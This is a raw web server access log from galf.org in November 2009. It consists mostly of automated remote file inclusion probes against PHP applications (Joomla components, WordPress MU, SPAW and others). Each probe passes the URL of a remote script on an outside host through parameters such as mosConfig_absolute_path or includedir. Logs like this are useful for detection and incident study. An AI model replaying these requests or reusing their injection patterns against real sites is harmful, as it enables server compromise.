174.120.175.4 - - [01/Nov/2009:18:30:25 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:18:30:25 -0800] "GET /e404.php?DOCUMENT_ROOT=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
77.221.130.11 - - [01/Nov/2009:18:33:11 -0800] "GET /xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:34:33 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:34:33 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:34:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:35:33 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:36:48 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:38:04 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:38:04 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:38:04 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:42:40 -0800] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:42:40 -0800] "GET /logs/access_090511.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:18:45:23 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 1049 "-" "libwww-perl/5.79" "www.galf.org"
91.151.255.21 - - [01/Nov/2009:18:47:30 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nuhalka.ru/senux/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "galf.org"
91.151.255.21 - - [01/Nov/2009:18:47:30 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nuhalka.ru/senux/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "galf.org"
91.151.255.21 - - [01/Nov/2009:18:47:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nuhalka.ru/senux/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "galf.org"
124.0.54.130 - - [01/Nov/2009:18:49:44 -0800] "GET /logs/access_090914.log/index.php?body=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:18:49:46 -0800] "GET /logs/index.php?body=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [01/Nov/2009:18:49:46 -0800] "GET /index.php?body=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:18:52:43 -0800] "GET /logs/access_090316.log////?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:18:52:43 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 1049 "-" "libwww-perl/5.79" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:18:52:44 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 4949 "-" "libwww-perl/5.79" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:54:59 -0800] "GET /logs/access_090316.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:55:00 -0800] "GET /logs/poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:55:00 -0800] "GET /poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:55:10 -0800] "GET /logs/access_090316.log/poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:55:12 -0800] "GET /logs/poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:18:55:12 -0800] "GET /poweredbywpmu//wp-pass.php?_wp_http_referer=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:18:57:11 -0800] "GET /logs/access_090921.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:18:57:11 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:18:57:11 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.130.56.21 - - [01/Nov/2009:18:59:36 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; ICS)" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:19:03:04 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:19:03:04 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [01/Nov/2009:19:06:21 -0800] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:19:09:00 -0800] "GET /logs/access_090316.log////?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:19:09:01 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 1049 "-" "libwww-perl/5.79" "www.galf.org"
218.149.84.14 - - [01/Nov/2009:19:09:02 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.topclimat.ru/banners/id? HTTP/1.1" 200 4949 "-" "libwww-perl/5.79" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:19:09:22 -0800] "GET /logs/access_090511.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:10 -0800] "GET /logs/access_090713.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:10 -0800] "GET ///tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:10 -0800] "GET /logs////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:17 -0800] "GET ///tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:17 -0800] "GET /logs/access_090713.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:17 -0800] "GET /logs////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:26 -0800] "GET /logs/access_090713.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:26 -0800] "GET ///tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:10:26 -0800] "GET /logs////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:11:36 -0800] "GET /logs/access_090511.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:11:41 -0800] "GET /logs/access_090511.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:11:41 -0800] "GET /logs/access_090511.log%20%20////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:19:14:46 -0800] "GET /logs/access_090713.log////tools/send_reminders.php?noSet=0&includedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:16:45 -0800] "GET /logs/access_090713.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:16:54 -0800] "GET /logs/access_090713.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.158.148.30 - - [01/Nov/2009:19:17:14 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:17:33 -0800] "GET /logs/access_090511.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:17:43 -0800] "GET /logs/access_090511.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:20:29 -0800] "GET /logs/access_090406.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:19:20:54 -0800] "GET /logs/access_090406.log////tools/send_reminders.php?noSet=0&includedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:20:57 -0800] "GET /logs/access_090831.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:19:21:25 -0800] "GET /logs/access_090831.log////tools/send_reminders.php?noSet=0&includedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.110.182 - - [01/Nov/2009:19:23:52 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
114.108.177.238 - - [01/Nov/2009:19:25:10 -0800] "GET /logs/access_090406.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:25:20 -0800] "GET /logs/access_090406.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:25:38 -0800] "GET /logs/access_090831.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:19:25:40 -0800] "GET /logs/access_090831.log////tools/send_reminders.php?noSet=0&includedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:16 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:16 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:17 -0800] "GET /logs/access.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:30 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:30 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:27:31 -0800] "GET /logs/access.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:28:29 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:28:30 -0800] "GET /logs/access.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:28:30 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:29:31 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:29:31 -0800] "GET /logs/access_090817.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:29:31 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:19:33:46 -0800] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.124.222.158 - - [01/Nov/2009:19:33:46 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.124.222.158 - - [01/Nov/2009:19:33:46 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [01/Nov/2009:19:36:50 -0800] "GET /common/db.php?commonpath=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
211.40.68.132 - - [01/Nov/2009:19:36:50 -0800] "GET /logs//common/db.php?commonpath=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:37:59 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:37:59 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:37:59 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:38:07 -0800] "GET /logs/access_090817.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:38:44 -0800] "GET /logs/access_090831.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:38:44 -0800] "GET /write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:38:45 -0800] "GET /logs//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:19:39:01 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:19:39:01 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.124.222.158 - - [01/Nov/2009:19:39:01 -0800] "GET /logs/access_090504.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:04 -0800] "GET /logs/access_090824.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:04 -0800] "GET /logs//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:04 -0800] "GET /write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:04 -0800] "GET /logs/access_090831.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:10 -0800] "GET /logs/access_090824.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:27 -0800] "GET /write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:27 -0800] "GET /logs//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:27 -0800] "GET /logs/access_090831.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:39:51 -0800] "GET /logs/access_090824.log//write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:41:30 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:41:31 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:42:14 -0800] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:42:14 -0800] "GET /logs/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:42:15 -0800] "GET /?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:42:17 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:42:20 -0800] "GET /logs/access_090817.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:37 -0800] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:37 -0800] "GET /?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:37 -0800] "GET /logs/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:44 -0800] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:44 -0800] "GET /logs/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:43:44 -0800] "GET /?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:44:28 -0800] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:44:46 -0800] "GET /logs/access_090914.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:45:47 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:45:47 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:45:47 -0800] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
